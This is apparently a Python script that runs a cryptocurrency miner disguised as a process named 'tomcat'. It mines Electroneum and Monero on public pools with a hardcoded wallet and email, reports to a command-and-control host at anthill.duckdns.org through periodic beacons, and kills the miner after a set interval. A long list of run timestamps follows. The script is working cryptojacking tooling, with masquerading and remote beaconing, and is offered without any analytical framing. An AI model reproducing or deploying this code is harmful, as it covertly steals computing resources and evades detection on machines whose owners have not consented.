import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:17:05.231636
#2018-02-17 17:04:05.832712
#2018-02-17 18:52:01.560607
#2018-02-17 20:39:05.060268
#2018-02-17 22:26:07.201950
#2018-02-18 00:09:06.280960
#2018-02-18 02:01:01.697587
#2018-02-18 03:48:06.297633
#2018-02-18 05:36:03.946728
#2018-02-18 07:29:02.020713
#2018-02-18 09:17:06.739532
#2018-02-18 11:05:08.255459
#2018-02-18 12:52:04.200475
#2018-02-18 14:38:02.118928
#2018-02-18 16:27:01.432704
#2018-02-18 18:16:04.404176
#2018-02-18 20:03:06.582494
#2018-02-18 21:50:04.511907
#2018-02-18 23:39:05.743999
#2018-02-19 01:25:06.294362
#2018-02-19 03:13:06.647256
#2018-02-19 04:57:06.955697
#2018-02-19 06:42:03.309134
#2018-02-19 08:31:05.258123
#2018-02-19 10:20:08.404540
#2018-02-19 12:08:06.297285
#2018-02-19 13:56:07.100382
#2018-02-19 15:45:16.876790
#2018-02-19 17:34:01.401615
#2018-02-19 19:21:07.943621
#2018-02-19 21:08:06.989131
#2018-02-19 22:55:06.861632
#2018-02-20 00:39:02.181688
#2018-02-20 02:28:05.896121
#2018-02-20 04:18:03.596165
#2018-02-20 06:02:04.537360
#2018-02-20 07:47:03.612396
#2018-02-20 09:33:07.571971
#2018-02-20 11:17:05.807875
#2018-02-20 13:03:05.947433
#2018-02-20 14:46:09.063775
#2018-02-20 16:28:10.950285
#2018-02-20 18:17:01.532317
#2018-02-20 20:07:07.899813
#2018-02-20 21:54:01.357139
#2018-02-20 23:35:09.825962
#2018-02-21 01:22:04.096356
#2018-02-21 03:11:04.081902
#2018-02-21 04:59:06.098618
#2018-02-21 06:48:05.448497
#2018-02-21 08:33:07.083757
#2018-02-21 10:19:03.745800
#2018-02-21 12:06:09.695466
#2018-02-21 13:55:12.769019
#2018-02-21 15:39:06.751205
#2018-02-21 17:29:02.224258
#2018-02-21 19:16:07.779250
#2018-02-21 21:04:07.020067
#2018-02-21 22:51:05.914317
#2018-02-22 00:40:01.547276
#2018-02-22 02:29:07.732338
#2018-02-22 04:16:03.651965
#2018-02-22 06:01:01.328257
#2018-02-22 07:47:03.419994
#2018-02-22 09:35:07.790939
#2018-02-22 11:20:07.966650
#2018-02-22 13:05:12.576931
#2018-02-22 14:52:09.389763
#2018-02-22 16:38:06.044301
#2018-02-22 18:23:02.175992
#2018-02-22 20:14:04.427594
#2018-02-22 22:01:07.191354
#2018-02-22 23:49:06.820229
#2018-02-23 01:38:01.612709
#2018-02-23 03:23:06.699364
#2018-02-23 05:09:04.340485
#2018-02-23 06:54:03.966339
#2018-02-23 08:39:06.807655
#2018-02-23 10:54:05.982349
#2018-02-23 12:51:08.658975
#2018-02-23 14:36:09.958078
#2018-02-23 16:27:08.987976
#2018-02-23 18:13:06.121512
#2018-02-23 19:58:07.208543
#2018-02-23 21:41:01.388036
#2018-02-23 23:35:01.616671
#2018-02-24 01:23:04.482247
#2018-02-24 03:13:06.393039
#2018-02-24 04:58:06.231552
#2018-02-24 06:48:05.603770
#2018-02-24 08:38:06.021516
#2018-02-24 10:22:04.978568
#2018-02-24 12:18:01.733441
#2018-02-24 14:11:04.445247
#2018-02-24 15:58:04.695965
#2018-02-24 17:49:01.902602
#2018-02-24 19:37:03.554018
#2018-02-24 21:24:07.267229
#2018-02-25 00:05:07.525905
#2018-02-25 03:18:07.868995
#2018-02-25 06:46:03.670733